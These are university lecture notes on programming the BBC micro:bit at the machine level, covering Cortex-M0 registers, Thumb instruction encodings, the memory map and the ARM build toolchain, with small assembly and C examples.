
Notes for Digital Systems

Copyright © 2017–2023 J. M. Spivey

Lecture 1 – Microcontrollers and embedded programming

Architecture of the micro:bit. Programmer's model. Execution of an instruction.

Introduction

[1.1] In this course, we'll be learning about computer hardware and low-level software. This term, we will start with machine-code programming, learning only enough about the hardware to understand how to program it; then we'll work our way up to programming in a high-level language, and using a very simple operating system. Next term, we will dig further down and begin with logic gates and transistors, working our way upwards again until we reach the level of machine instructions and complete the circle. Anything below the level of transistors is magic to us.

This term and next term

The programming we will do, and the machines we will use, are typical of embedded applications, where a computer is used as part of some other product, perhaps without the owner even knowing there is a computer inside. Any device you own that has any kind of display, or buttons to push, probably has a microcontroller inside, rather than custom-built digital electronics, and the reason is simple. Microcontrollers – that is, microprocessors with some ROM and RAM integrated on the chip – can be bought today for 50p each or less,[1] and it's much easier to design a board with a microcontroller on it and program it later than to design and build a custom logic circuit.

micro:bit system architecture

[1.2] We will program the BBC micro:bit, a small printed circuit board that contains an ARM-based microcontroller and some other components.

  • As well as the microcontroller, the board has a magnetometer and an accelerometer, connected via an "inter-integrated circuit" (I2C) bus.
  • The board has some LEDs and buttons that provide inputs and outputs.
  • There's also a second microcontroller on board that looks after the USB connection, providing a programming and debugging interface, and allowing access over USB to the serial port (UART) of the main microcontroller.
micro:bit

[1.3] The microcontroller is a Nordic Semiconductor nRF51822.

  • It contains an ARM-based processor core.
  • Also some on-chip RAM (16kB!!!) and ROM (256kB), with the ROM programmable from a host computer.
  • The chip has peripheral devices like GPIO (for the buttons and lights), an I2C interface, and a UART.
  • The chief selling point of the Nordic chips is that they also integrate the radio electronics for Bluetooth, but we probably won't be using that.

The processor core is (almost) the tiniest ARM, a Cortex-M0.

  • It has the same set of 16 registers as any other ARM32, and a datapath that implements the same operations.
  • The instruction set (Thumb) provides a compact 16-bit encoding of the most common instructions.
  • There is an interrupt controller (NVIC) that lets the processor respond to external events.
  • Because of the needs of Bluetooth, the datapath has the snazzy single-cycle multiplier option.

The micro:bit comes with a software stack that is based on the MBED platform supported by ARM, with subroutine libraries that hide the details of programming the hardware I/O devices. On top of that, programmers at Lancaster University have provided a library of drivers for the peripheral devices present on the board, and that provides the basis for various languages that are used for programming in schools, including MicroPython, JavaScript, and something like Scratch. We will ignore all that and program the board ourselves, starting from the bare metal.

Context

Microcontrollers with a 32-bit core are becoming more common, but the market is still dominated by 8-bit alternatives such as the AVR (as used in Arduino) and the PIC – both electrically more robust, but significantly less pleasant to program. As we'll see, the embedded ARM chips have an architecture that is simple, regular, and well suited as a target for compilers. Other 32-bit microcontroller families also exist, such as the PIC-32 family based on the MIPS architecture. One level up are the "System on a chip" products like the ARM processors used in mobile phones and the Raspberry Pi, and the MIPS-based devices that are commonly used in Wifi routers: these typically have hundreds of megabytes of RAM, and run a (possibly slimmed-down) version of a full operating system. By way of contrast, the operating system we shall develop for the micro:bit is really tiny.

Programming the micro:bit

Cortex-M0 registers

[1.4] To start programming the micro:bit at the machine level, we will need to know what registers it has, because registers hold the inputs and outputs of each instruction. Like every 32-bit ARM (including the bigger ARM chips used on the Raspberry Pi), the micro:bit has 16 registers. According to the conventions used on Cortex-M0, registers r0 to r7 are general-purpose, and can be used for any kind of value. The group r0 to r3 play a slightly different rôle in subroutine calls from the group r4 to r7, but we'll come to that later.

Registers r8 to r12 are not used much, because as we'll see, the instruction set makes it hard to access them. I don't think we'll use them at all in the programs we write. The remaining three registers all have special jobs:

  • sp is the stack pointer, and contains the address of the lowest occupied memory cell on the subroutine stack.
  • lr is the link register, and contains the address where the current subroutine will return.
  • pc is the program counter, and contains the address of the next instruction to be executed.

There's a seventeenth register psr, also with a special purpose, in fact several purposes attached to different bits. Four of the bits, the comparison flags N, Z, C and V, influence the outcome of conditional branch instructions in a way that we shall study soon. Other bits have meanings that become important when we think of using interrupt-based control or writing an operating system: more of that later.

[1.5] We can begin to see how these registers are used by considering a program with just one instruction. Suppose that the 16-bit memory location at address 192 contains the bit pattern 0001 1000 0100 0000. We could write that in hexadecimal[2] as 0x1840. In other contexts, it might represent the integer 6208, or an orange colour so dark as to be almost black. But here it represents an instruction that would be written in assembly language as adds r0, r0, r1:

0001100 001 000 000
adds    r1  r0  r0

(The fact that the bit-fields of the instruction appear in a different order from the register names in the written instruction doesn't at all matter, provided the assembler program and the hardware agree on the ordering.) When this instruction is executed, the machine adds together the integer quantities that it finds in registers r0 and r1, and puts the result into register r0, replacing whatever value was stored there before.

For example, if the machine is in a state where

 pc = 192     r0 = 23     r1 = 34     r2 = 96     ...     lr = 661     nzcv = 0010

then the next state of the machine will be

 pc = 194     r0 = 57     r1 = 34     r2 = 96     ...     lr = 661     nzcv = 0000

and incidentally (that's the meaning of the s in adds) the NZCV flags have all been set to 0. As you can see, the addition of r0 and r1 has been done, and the result is in r0. Also, the program counter has been increased by 2, because that is the size in bytes of the instruction. (On the Cortex-M0, nearly all instructions are 2 bytes long.)

[1.6] As it happens, the next instruction at address 194 is 0x4770, and that decodes as bx lr, an instruction that reloads the program counter pc with the value held in lr, which is the address of the next instruction after the one that called this subroutine.

 pc = 660     r0 = 57     r1 = 34     r2 = 96     ...     lr = 661     nzcv = 0000

A detail: for compatibility with the larger processors, the lr register records in its least significant bit the fact that the processor is in Thumb mode (16 bit instructions): the value is 661 = 0x295 = 0000001010010101. This bit is cleared when the value is loaded into the pc, and the address of the next instruction executed is 0x294; if the 1 bit is not present in lr, then an exception occurs – with the lab programs, the result is the Seven Stars of Death.

At address 0x294 in our program is code compiled from C that outputs the result of the addition over the serial port.

Decoding chart for Thumb instructions

[1.7] You can decode these numeric instructions by consulting the Architecture Reference Manual for the Cortex-M0. As a reminder, I like to keep by me a handy chart (click the preview above) showing all the instruction encodings on one page. You can find the adds instruction in orange on chart [A], and the bx instruction in blue on chart [B].

Instruction decoding

[1.8] On bigger chips in the ARM family (like the ARM11 that is used in the Raspberry Pi), ordinary instructions are 32 bits long, and the more compact 16 bit instructions that are used on the micro:bit are a seldom-used option: why worry about code size when you have 1GB of memory? The 32-bit instruction set is very regular, and lets you express instructions that add or subtract or multiply numbers from any two of the 16 registers and put the result in a third one. This makes the instruction set easy to understand, and the regularity makes the process of writing a compiler easier too. The 16-bit instructions are more restrictive because, as shown above, the fields in an adds instruction for specifying registers are only 3 bits long, and that makes only registers r0 to r7 usable.

As the diagram shows, the bigger chips have two instruction decoders, one for 32-bit native instructions and another for 16-bit Thumb instructions, and there is a multiplexer (the long oval shape) controlled by the mode bit, actually a bit in the psr register, to choose which is used. Both decoders produce the same signals for controlling the datapath that actually executes the instructions, so that the instructions that are expressible in the Thumb encoding agree exactly in their effect with certain 32-bit instructions.

On the micro:bit, the 32-bit decoder is missing, so all instructions must be expressed in the 16-bit encoding, and the mode bit must always be 1. It might be better to say there was no mode bit at all, except for the fact that you can try to set it to 0, and that causes a crash and (with our lab software) shows the Seven Stars of Death on the LEDs.

Context

The Cortex-M0 shares some attributes typical of RISC machines:

  • The large(-ish) set of uniform registers. By way of contrast, early microprocessors had only very few registers, and each had a specific purpose: only the A register could be used for arithmetic, only the X register used for indexed addressing, etc.
  • Arithmetic instructions that operate between registers. The most common instructions (add, sub, cmp) can operate with any two source registers, and write their result (if any) in a third register. There is limited support for embedding small constant operands in the instruction, and separate provision of some kind for loading an arbitrary constant into a register.
  • Access to memory uses separate load and store instructions, supporting a limited set of simple addressing modes: in this case, register plus register, and register plus small constant.

The most unusual feature of the ARM ISA is that execution of every instruction – not just branches – can be made dependent on the condition codes. The Thumb encoding gets rid of this, allowing only branches to be conditional.

The simplicity and uniformity that is typical of RISC instruction sets is compromised a bit by the complexity of the Thumb encoding. In theory, the absolute uniformity of a RISC instruction set makes things easy for a compiler; in practice, the restrictions of the Thumb encoding make little difference, because most common operations have a compact encoding, and the restrictions are easy enough to incorporate in a compiler that generates code by following a set of explicit rules.

In the next few lectures, we will explore programming the micro:bit at the machine level, slowly increasing the range of machine features our programs will use:

  • first, we'll use instructions that ask for arithmetic and logical operations on values that are stored in the registers of the machine, using them in straight-line programs.
  • then, we'll add branch instructions that let us express conditional execution and loops, so that programs can express more than a single, limited chain of calculations.
  • next, we'll introduce subroutines, or rather, we'll write assembly language programs with several subroutines, with one able to call another.
  • finally, we add the ability to load and store values in the random-access memory of the machine, so that programs can work on more data than will fit in the small set of registers.

Two points about this sequence of tours of the machine:

  • First, we're not studying these things because of any need to use assembly language to write actual programs. In the olden days, compilers were weaker, and sometimes programmers would use assembly language to speed up small but vital parts of their programs. Those days are past, and now compilers are able to generate perfectly good code without our help – in fact, code that is often better than we could write by hand, because they are able to deal with tedious details that would overwhelm our patience. Also, it used to be that some assembly language was needed as an interface between the hardware and code compiled from a high-level language, or perhaps to initialise the machine when it first woke up. Those days are gone too, and in Lab zero, our very first program will be written entirely in C, with no assembly-language parts at all. It's a strength of the ARM design that this is possible.
  • The second point: we are not going to start programming from scratch. In the good old days, you could sit at the console of the machine, toggle in a program in binary, then execute it step by step, stopping between each instruction and the next to examine the contents of registers. Those days are long gone, alas, and what we will do instead is use a main program written in C to feed values to an assembly-language subroutine (written by us) and print the results it returns. We won't study until much later the techniques that main program uses to do input and output, but will just take for granted that it does its job. You have to start somewhere!

Questions

How does the processor know how many instruction bits to use as the opcode?

This answer must have two parts: (i) what algorithm can be used to decode an instruction? and (ii) how can the algorithm be implemented as an electronic circuit? I'll leave part (ii) for next term: for now it's enough to see that there's a pencil-and-paper algorithm that solves the problem. And that's simple – use the rainbow chart. Look up the first seven bits of the instruction in table [A]. If the result is a coloured region, that is the instruction, and what instruction it is determines the detailed way the rest of the bits are interpreted. (If the coloured region is more than one cell, then some of the first seven bits will contribute to the detail too.) If table [A] gives a reference to another table, then take a few more bits of the instruction and look them up in that table.

Note that there are several entries in the rainbow chart that are labelled with a mnemonic like adds, and they're distinguished by my invented notations adds r (meaning add between registers), adds i3 (meaning add with a 3-bit immediate field), etc. All are generated from assembly language instructions beginning adds, and the assembler knows how to choose the encoding based on the pattern of operands. Each of these variants (more or less) has its own page in the ARM Architecture Reference Manual.

How does the control unit know to interpret the last nine bits of an adds instruction 0x1840 as the names of three registers?

The leading few bits of the instruction, up to 10 of them, determine which instruction encoding applies – adds ra, rb, rc in this case, determined by the leading seven bits. This determines the interpretation of the rest of the instruction. In this case the remaining nine bits are fed by the control unit to the datapath in three groups of three so as to determine which registers take part in the addition.

0001100 001 000 000     adds r0, r0, r1
adds    r1  r0  r0

There's another instruction encoding where a three-bit constant is fed to the datapath as the second operand instead of a register.

0001110 011 001 000     adds r0, r1, #3
adds    3   r1  r0

The control unit behaves differently in the two cases because the opcode is different. The colourful decoding chart enables us to deduce what instruction encoding applies to any string of 16 bits, but it doesn't specify exactly how the remaining bits are interpreted: in this case, it tells us that nine bits of the instruction are three register names or two registers and a three-bit constant, but not what order they appear. For that, you need to look at the appropriate page in the Architecture Reference Manual.
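
To make the bit-fiddling concrete, here is a little C sketch (not part of the lab code) that extracts the fields of 0x1840 in just the way described above:

#include <stdio.h>

/* Pick apart the encoding 0001100 mmm nnn ddd of adds rd, rn, rm,
   as shown in the decoding chart. */
int main(void) {
    unsigned instr = 0x1840;
    unsigned opcode = (instr >> 9) & 0x7f;   /* leading seven bits: 0001100 */
    unsigned rm = (instr >> 6) & 0x7;        /* second source register */
    unsigned rn = (instr >> 3) & 0x7;        /* first source register */
    unsigned rd = instr & 0x7;               /* destination register */
    printf("opcode=%#x: adds r%u, r%u, r%u\n", opcode, rd, rn, rm);
    return 0;
}

Running it prints opcode=0xc: adds r0, r0, r1, agreeing with the decoding worked out by hand.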

When programming, I mostly find the chart useful as a reminder of what encodings exist: for example, the instructions

adds r0, r1, #3

and

adds r0, r0, #27

are legal, but

adds r0, r1, #27

is not, because there is no way to encode it, and you have to write movs r0, r1; adds r0, r0, #27 instead.



  1. https://uk.farnell.com/stmicroelectronics/stm32f030f4p6tr/mcu-32bit-cortex-m0-48mhz-tssop/dp/2432084
  2. In this course, I'll always write hexadecimal constants using the C notation 0x...

Lecture 2 – Building a program

Compiling and building a program.

Memory map


[2.1] The other piece of information needed to design programs for the micro:bit is the layout of the memory. As the diagram shows, there are three elements, all within the same address space:

  • 256kB of Flash ROM, with addresses from 0x0000 0000 to 0x0003 ffff. This is where programs downloaded to the board are stored. Significantly, address zero is part of the Flash, because it is there that the interrupt vectors are stored that, among other things, determine where the program starts.
  • 16kB of RAM, with addresses from 0x2000 0000 to 0x2000 3fff. This is where all the variables for programs are stored: both the global variables that are not part of any subroutine, and the stack frames that contain local variables for each subroutine activation.
  • I/O registers in the range from 0x4000 0000 upward. Specific locations in this range correspond to particular I/O devices. For example, storing a character at address UART_TXD = 0x4000 251c will have the effect of transmitting it over the serial port, and storing a 32-bit value at GPIO_OUT = 0x5000 0504 has the effect of illuminating some or all of the LEDs on the board.

It's possible for the contents of Flash to be modified under program control, but we shall not use that feature.

Naturally enough, information about the layout of memory must form part of any programs that run on the machine. In our code, it is reflected in two places: the linker script nRF51822.ld contains the addresses and sizes of the RAM and ROM, and instructions about what parts of the program go where; and the header file hardware.h contains the numeric addresses of I/O device registers like UART_TXD and GPIO_OUT. This information comes from the data sheet for the nRF51822 chip.
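
Here is a sketch in C of the usual technique, using the two addresses quoted above; the real hardware.h is more elaborate, but the principle is the same:

/* An I/O register is just a volatile unsigned at a fixed address, so an
   ordinary assignment becomes a hardware store. */
#define UART_TXD  (*(volatile unsigned *) 0x4000251c)
#define GPIO_OUT  (*(volatile unsigned *) 0x50000504)

void demo(void) {
    UART_TXD = 'A';          /* transmit one character (no ready-check shown) */
    GPIO_OUT = 0x00005ff0;   /* an arbitrary pattern for the LED pins */
}

The volatile qualifier stops the compiler from optimising the stores away or reordering them, which matters when a memory location is really a device register.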

To think about: why was the nRF51822 designed with so little RAM?

Context

Other microcontrollers adopt two alternatives to this single-address-space model:

  • Sometimes I/O devices are accessed with special instructions, and have their own address space of numbered 'ports'. This is not really such a significant difference, because performing I/O still amounts to selecting a port by its address and performing a read or write action.
  • Sometimes the processor has its program in a different address space from its data. This is an attractive option for microcontrollers, where the program is usually fixed and can be stored in a ROM separate from the RAM that is used for data. It's called a 'Harvard architecture', in contrast with the 'von Neumann architecture' with a single memory. If the two address spaces are separate, then separate hardware can be used to access the ROM and the RAM, and it can access both simultaneously without fear of interference between the two. The disadvantage is that special instructions are usually needed to access, e.g., tables of constant data held in the ROM.

More complex processors with cache memory between the processor and RAM often adopt a 'modified Harvard architecture' where there are independent caches, concurrently accessible, for code and data, but with a single, uniform RAM behind them.

Building a program

Source code: lab1-asm

Lab one for this course lets you write small subroutines in Thumb assembly language and test them, using a main program that prompts for two numbers, calls your subroutine with the two numbers as arguments, then prints the arguments and result.

As you will see in the demo, the arguments and result are shown both in decimal and in hexadecimal; you can enter numbers in hexadecimal too by preceding them with the usual 0x prefix.

[2.2] This program is built from your one subroutine written in assembly language, with the rest of the program written in C for convenience. (At some point, we'll make a program written entirely in assembly language just to demonstrate that it's possible.) Let's begin by looking at the entire contents of the source file add.s that defines the function foo. The lines starting with @ are comments.

@ This file is written in the modern 'unified' syntax for Thumb instructions:
        .syntax unified

@ This file defines a symbol foo that can be referenced in other modules        
        .global foo

@ The instructions should be assembled into the text segment, which goes
@ into the ROM of the micro:bit
        .text

@ Entry point for the function foo
        .thumb_func
foo:
@ ----------------
@ Two parameters are in registers r0 and r1

        adds r0, r0, r1          @ One crucial instruction

@ Result is now in register r0
@ ----------------
@ Return to the caller
        bx lr

[2.3] The one instruction that matters is the line reading adds r0, r0, r1. Let's assemble the program:

$ arm-none-eabi-as add.s -o add.o

This command takes the contents of file add.s, runs them through the ARM assembler, and puts the resulting binary code in the file add.o. We can see this code by dis-assembling the file add.o, using the utility objdump.

$ arm-none-eabi-objdump -d add.o
00000000 <foo>:
   0:  1840            adds    r0, r0, r1
   2:  4770            bx      lr

This reveals that the instruction adds r0, r0, r1 is represented by the 16 bit value written as hexadecimal 0x1840.

The program also contains four files of C code, and we will need to translate those also into binary form using the compiler arm-none-eabi-gcc. The easy way to do that is to invoke the command make, because the whole procedure for building the program has been described in a Makefile:

$ make
arm-none-eabi-gcc -mcpu=cortex-m0 -mthumb -g -O -c main.c -o main.o
arm-none-eabi-gcc -mcpu=cortex-m0 -mthumb -g -O -c lib.c -o lib.o
arm-none-eabi-gcc -mcpu=cortex-m0 -mthumb -g -O -c startup.c -o startup.o

Notice that the C compiler is being asked to generate Thumb code for the Cortex-M0 core that is present in the micro:bit; it is also being asked to include debugging information in its output (-g), and to optimise the object code a bit (-O). We don't use higher levels of optimisation (-O2 or -Os), because they make the object code harder to understand and interfere with running it under a debugger.

What are these files of C code anyway? Well, main.c contains the main program, with the loop that prompts for two numbers, passes them to your foo subroutine, then prints the result. It also contains a simple driver for the micro:bit's serial port so that the program can talk to a host PC via USB and minicom. The file lib.c contains a simple implementation of the formatted output function printf that we shall use in most of our programs. Finally, the file startup.c contains the code that runs when the micro:bit starts ("comes out of reset"), setting things up and then calling the main program.

Compiling and linking

[2.4] Having done all this compiling and assembling, we have four binary files with names ending in .o. To make them into one program, we need to concatenate the code from all these files, then fix them up so that references from one file to another (and within a single file too) use the right address. All this is done by the linker ld, or more accurately arm-none-eabi-ld. Often, we invoke the linker via the C compiler gcc, because that lets gcc add its own libraries into the mix; but so that we can see all that is happening, the Makefile contains a command to invoke ld directly:

arm-none-eabi-ld add.o main.o lib.o startup.o \
    /usr/lib/gcc/arm-none-eabi/5.4.1/armv6-m/libgcc.a \
    -o add.elf -Map add.map -T nRF51822.ld

This links together the various .o files, and also a library libgcc.a that contains routines that the C compiler relies on to translate certain C constructs – in particular, the integer division that is used in converting numbers for printing. The output file add.elf is another file of object code in the same format as the .o files. Another output from the linker is a report add.map that shows the layout of memory, and that layout is determined partially by the linker script nRF51822.ld that describes the memory map of the chip and what each memory area should be used for. You'll see that the Makefile next invokes a program called size to report on the size of the resulting program, so we can see how much of the memory has been used: not much in this case.

The file add.elf contains the binary code for the program, but sadly it is in the wrong format for downloading to the board. So the final step of building described in the Makefile converts the code into "Intel hex" format, which is what the board expects to receive over USB.

arm-none-eabi-objcopy -O ihex add.elf add.hex

Building is now done, and we can copy the file add.hex to the board. On my machine, I can type

$ cp add.hex /media/mike/MICROBIT

and the job is done. (Something like

$ cp add.hex /run/media/u19abc/MICROBIT

is needed on the Software Lab machines.)

Although it's not necessary for running the program, it's fun to check that the binary instructions 0x1840 and 0x4770 appear somewhere in the code. If you look in add.hex, you will find that line 13 is

:1000C00040187047074B1B68002B03D1064A136882

and that contains the two fragments 4018 and 7047, which rearrange to give 1840 and 4770. (Why is the rearrangement needed? You can find a specification for Intel hex format on Wikipedia.)
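
As a hint: the ARM is a little-endian machine, storing the least significant byte of each word first. This little C program, runnable on any little-endian host, shows the effect:

#include <stdio.h>
#include <stdint.h>

/* The 16-bit word 0x1840 is stored least significant byte first, so the
   bytes appear in memory (and in the hex file) as 40 18. */
int main(void) {
    uint16_t instr = 0x1840;
    unsigned char *p = (unsigned char *) &instr;
    printf("%02x %02x\n", p[0], p[1]);   /* prints 40 18 */
    return 0;
}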

Alternatively, you can make a pure binary image of the program with the command

$ arm-none-eabi-objcopy -O binary add.elf add.bin

and then look at a hexadecimal dump of that file, divided into 16-bit words:

$ hexdump add.bin
...
00000c0 1840 4770 4b07 681b 2b00 d103 4a06 6813

(Even on a 32-bit machine, tradition dictates that hexdump splits the file into 16-bit chunks.) As you can see, the two instructions 0x1840 and 0x4770 appear at address 0xc0 in the image.

Other instructions

For the single adds instruction that appears in func.s, we can substitute others.

  • There is an instruction subs that subtracts instead of adding. We quickly find that the conventions for representing numbers as bit patterns allow negative numbers to be represented too.
subs r0, r0, r1
  • Since subtraction is not commutative, it makes a difference if we specify the inputs in the opposite order
subs r0, r1, r0
  • The Nordic chip has the optional multiplier, so it implements the muls instruction, but Thumb code imposes the restriction that the output must be the same as one of the inputs. You can see this from the Reference Manual page for muls.
muls r0, r0, r1
  • We can use several instructions to compute more complex expressions. Here we compute a * (b + 3) by first putting b + 3 in register r2.
adds r2, r1, #3
muls r0, r0, r2
  • If we try a * 5 + b, then we find there is no form of the muls instruction that contains a constant. So we write instead
movs r2, #5
muls r0, r0, r2
adds r0, r0, r1

Thumb code restricts what sensible operations actually exist as instructions. At first sight, this is irksome and requires us to memorise lots of silly rules. But with a bit of experience, we find that most instructions we want to write can actually be written, and for most purposes we can give over the generation of instructions to a compiler, which is better than us at encoding and applying the rules.

  • For an expression like (a + b) * (a - b), we will need to compute at least one of the operands of the multiplication into a register other than r0 and r1. Registers r2 and r3 are freely available for this purpose, so let's choose r3.
subs r3, r0, r1
adds r0, r0, r1
muls r0, r0, r3

Experience with the debugger shows that when func is called, registers r2 and r5 contain copies of b. The ABI – that is, the conventions about what registers can be used where – allows us to change the value in r2, as we did in the a * (b + 3) example. What if we naughtily change the value in r5 instead?

movs r5, #5
muls r0, r0, r5
adds r0, r0, r1

Ah! It changes the value of b that is printed by the main program:

a = 10                                                                          
b = 1                                                                           
func(10, 5) = 51                                                                
func(0xa, 0x5) = 0x33                                                           
6 cycles, 0.375 microsec

We see that the main program was saving the value of b in r5 across the call to func(a, b) so that it could print it afterwards. (The value of a is saved in memory, presumably.) By overwriting r5 we have spoiled that. For a leaf routine like func that calls no others, only registers r0 to r3 can be changed unless we take steps to restore them before returning. When we start to write subroutines that call others, we will be able to exploit this by ourselves keeping values in r4 to r7 that we expect to be preserved by those other subroutines. So there is a kind of contract, imposed by convention not by the hardware, that ensures that subroutines can work together harmoniously. The contract covers the fact that arguments are passed in r0 to r3 and the return address in lr, the result is returned in r0, and r4 to r7 (actually, r8 to r11 too) must be preserved. Subroutines that need more registers than r0 to r3 must take steps to save and restore those other registers that they use. Subroutines that call others must at least preserve the value of lr they receive so that they can return properly. Mechanisms for all of this will emerge later in the course.

Instruction encodings

At first sight, it seems that the rules for what instructions can be encoded in the Thumb format will be irksome in programming, but in practice they are not a great burden. This is partly because the statistically commonest instructions tend to have an encoding, thanks to the skill of the ARM designers, but also because a lot of our work with assembly language programs is in reading them and understanding what they do, rather than writing them by hand. A compiler can easily be made to follow the rules blindly and produce legal and efficient programs.

In detail, additions involving the low registers r0 to r7 come in several encodings. First, there's the three-register version

adds r0, r1, r2

that is encoded like this:

Adds-rrr format.png

If the first two registers mentioned in the instruction are the same, as in adds r0, r0, r1, then the assembler lets us write the instruction as adds r0, r1 instead, but that doesn't affect the binary code that it generates, which is the same in both cases.

For adding a constant to the contents of a register, there are two ways of encoding the instruction. One encoding allows the result to be put in a different register from the operand.

Adds-rri format.png

Let's call that Form A. As you can see, there are only three bits to encode the constant, so the allowable range is from 0 to 7. Form B requires the source and destination registers to be the same, but has space for an 8-bit constant with a value from 0 to 255.

Adds-ri format.png

The assembler lets us write the same instruction either as adds r0, #1 or as adds r0, r0, #1, producing the same binary code in either case. If you look back at your own programs, you will probably find that by far the most common form of addition is the statement

count = count + 1;

and if count lives in a register, this is easily encoded using either Form A or Form B; the assembler happens to use Form B in this case.
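
Here is a sketch in C of how an assembler might choose between the two forms; the bit layouts come from the diagrams above, and the function name is invented for the example. It returns 0 when no 16-bit encoding exists.

#include <stdio.h>

/* Choose an encoding for adds rd, rn, #imm: Form B (00110 ddd iiiiiiii)
   when rd == rn and the constant fits in 8 bits, otherwise Form A
   (0001110 iii nnn ddd) when the constant fits in 3 bits. */
unsigned encode_adds_imm(unsigned rd, unsigned rn, unsigned imm) {
    if (rd == rn && imm <= 255)
        return 0x3000 | (rd << 8) | imm;             /* Form B */
    if (imm <= 7)
        return 0x1c00 | (imm << 6) | (rn << 3) | rd; /* Form A */
    return 0;                                        /* not encodable */
}

int main(void) {
    printf("%#06x\n", encode_adds_imm(0, 1, 3));   /* adds r0, r1, #3  -> 0x1cc8 */
    printf("%#06x\n", encode_adds_imm(0, 0, 27));  /* adds r0, r0, #27 -> 0x301b */
    printf("%#06x\n", encode_adds_imm(0, 1, 27));  /* adds r0, r1, #27 -> 0 */
    return 0;
}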

Subtract instructions subs between low registers can be encoded in exactly the same variety of ways as adds instructions. As regards the other instructions we have used, move instructions have two variations, depending on whether the source is a register or a constant. There is a register-to-register form:

Movs-rr format.png

Actually, this turns out to be a special case of the lsls instruction that shifts the register contents left by a number of bits, with the number being zero, so the instruction movs r0, r1 can also be written lsls r0, r1, #0. We will have more to say about shift instructions later.

The form of movs that puts a constant in a register allows any constant from 0 to 255 in an 8-bit field.

Movs-ri format.png

For many programs, we will need constants that don't fit in 8 bits; they require a special treatment that will be introduced later.

Unlike adds and subs, the multiply instruction muls exists only in a form where it operates between registers, and requires the output register to be the same as one of the input registers.

Muls-rr format.png

Assembly language syntax

As well as the two instructions adds r0, r0, r1 and bx lr, the assembly language file func.s contains several other elements. These can be copied without much change into most other assembly language programs we write, but for completeness I will explain them here.

All the lines that begin with an at-sign @ are comments, ignored by the assembler in translating the program. The last part of a line containing another element can also be a comment prefixed by @: this is helpful because most lines of assembly language deserve a comment explaining what is going on in the program.

Other lines contain directives that affect the way the assembler translates the program.

    .syntax unified

This tells the assembler that the remainder of the file is written using the most recent, 'unified', conventions for ARM code, where instructions are written the same way whether they are translated into Thumb code or native ARM code – and not the earlier, 'divided', conventions that were different for different chips.

    .global func

This makes the label func accessible to other modules in the program: it's necessary so that the main program that prompts for inputs and prints the results can call our subroutine.

    .text

This causes the code that follows to be placed in the text segment of the program, which the linker will later load into the Flash memory of the micro:bit, as is appropriate for the instructions that make up the program.

    .thumb_func
func:

These two lines begin a subroutine named func that will be assembled into Thumb code. The .thumb_func directive labels the subroutine as being in Thumb code, and this sometimes affects the way it is called. Usually, the directive can be omitted, but for those few times when it's needed, it's simplest to include it always. The instructions that make up the subroutine func follow.

Questions

What is the file /usr/lib/gcc/arm-none-eabi/5.4.1/armv6-m/libgcc.a that is mentioned when a program is linked?

It's a library archive (extension .a) containing subroutines that may be called from code compiled with gcc. For example, the program in Lab 1 contains a C subroutine (xtoa in lib.c) for converting numbers from binary to decimal or hexadecimal for printing, and that subroutine contains the statement x = x / base. Since the chip has no divide instruction, gcc translates the statement into a call to a subroutine with the obscure name __aeabi_uidiv, and that subroutine is provided in the library archive. Exercise 1.6 asks you to write a similar subroutine for yourself.

If you're prepared to use that integer division subroutine from the gcc library, why not use the library version of printf too, instead of writing your own?

Using the library version of printf pulls in a lot of other stuff – for example, since the standard printf can format floating-point numbers, including it also drags in lots of subroutines that implement floating-point arithmetic in software. That's OK, but (a) I wanted to keep our programs small for simplicity, and (b) although we are not likely to fill up the 256kB of code space on the nRF51822, on other embedded platforms it's wise to keep a close eye on the amount of library code that is included in the program but not really used. Added to that, the version of printf in the standard library can call malloc, and we don't want that.


Lecture 3 – Multiplying numbers

Conditional and unconditional branches. Instruction encodings. Execution time.


Multiplying numbers

[3.1] The nRF51822 implements the optional integer multiply instruction, but let's pretend for a little while that it doesn't, and write our own subroutine for multiplying two integers together. We could write it in C.

unsigned foo(unsigned a, unsigned b) {
    unsigned x = a, y = b, z = 0;

    /* Invariant: a * b = x * y + z */
    while (y != 0) {
        y = y - 1;
        z = z + x;
    }

    return z;
}

Here we use the unsigned type that represents integers in the range \([0..2^{32})\), because the simple algorithm doesn't deal with negative numbers. It is the simplest algorithm imaginable, computing a * b by adding together b copies of a.

Let's rewrite that subroutine in assembly language, partly for practice, and partly so we can study what takes the time when we run it on a machine. We will follow the convention that the two arguments a and b arrive in registers r0 and r1: if we arrange to keep x in r0 and y in r1 during the subroutine body, then we won't have to do anything to set x to a and y to b initially. We'll keep z in r2.

[3.2] Here's an implementation of the same subroutine in assembly language, obtained by translating the C code line by line.

foo:
@ -----------------
        movs r2, #0         @ z = 0
loop:
        cmp r1, #0          @ if y == 0
        beq done            @     jump to done
        subs r1, r1, #1     @ y = y - 1
        adds r2, r2, r0     @ z = z + x
        b loop              @ jump to loop
done:
        movs r0, r2         @ put result in r0
@ -----------------
        bx lr

There are many things to notice here.

  • Arithmetic happens between registers, so
subs r1, r1, #1
subtracts the constant 1 from register r1, putting the result back in r1. And
adds r2, r2, r0
adds the number in r0 to the number in r2, putting the result back in r2.
  • Control structures like the while loop are implemented with conditional and unconditional branches. Thus, the two instructions
cmp r1, #0
beq done
compare the number in r1 with the constant 0; if they are equal, the second instruction "branch-if-equal" takes effect, and execution of the program continues at label done instead of the next instruction. The cmp instruction sets the four bits NZCV in the processor status word according to the result of the comparison, and the beq instruction interprets these bits to find whether the two values compared were equal; it branches if the Z bit is 1. At the end of the loop is an unconditional branch back to the start, written
b loop

Context

This scheme of having condition codes set by arithmetic instructions or by explicit comparisons, followed by conditional branches that test the condition codes, is an almost universal feature of instruction set architectures, and the interpretation of the NZCV bits is practically standard. Only a few architectures (e.g., the MIPS) are different.

  • We can set a register to a small constant (in the range [0..256) ) with an instruction like
movs r2, #0
or copy a value from one register to another with
movs r0, r2
That's used in the subroutine to put the result (accumulated in r2) into the register r0 where our caller expects to find it.
  • In a simple subroutine like this, we are free to use registers r0, r1, r2, r3 as we like, without worrying that they may hold values needed elsewhere. We can also use r4 to r7, provided we preserve and restore their values, in a way we shall see later.

[3.3] By disassembling the program, we can see how these new instructions are encoded.

$ arm-none-eabi-objdump -d mul1.o
00000000 <foo>:
   0:  2200      movs    r2, #0 
00000002 <loop>:
   2:  2900      cmp     r1, #0
   4:  d002      beq.n   0xc <done>
   6:  3901      subs    r1, #1
   8:  1812      adds    r2, r2, r0
   a:  e7fa      b.n     0x2 <loop>
0000000c <done>:
   c:  0010      movs    r0, r2
   e:  4770      bx      lr

Note that at offset 0x4, the beq instruction is assembled as 0xd002: in binary,

1101 0000 00000010
b    eq   offset 2

